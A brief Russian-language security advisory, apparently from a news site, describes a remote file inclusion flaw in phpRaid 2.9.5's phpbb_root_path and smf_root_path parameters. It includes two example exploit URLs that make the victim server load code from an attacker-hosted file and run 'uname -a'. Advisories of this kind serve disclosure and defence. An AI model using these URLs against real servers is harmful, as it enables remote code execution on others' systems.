Программа: phpRaid 2.9.5, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "phpbb_root_path" в сценарии auth/auth_phpbb.php и параметре
smf_root_path в сценарии auth/auth_SMF.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный PHP сценарий
на целевой системе с привилегиями Web сервера. Для удачной эксплуатации
уязвимости опция "register_globals" должна быть включена.

Пример:

http://victim/[phpraidpath]/auth/auth_phpbb/phpbb_root_path= http://www.yourcode.com/x.txt?&cmd=uname
–a
http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path= http://www.yourcode.com/x.txt?&cmd=uname
-a
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии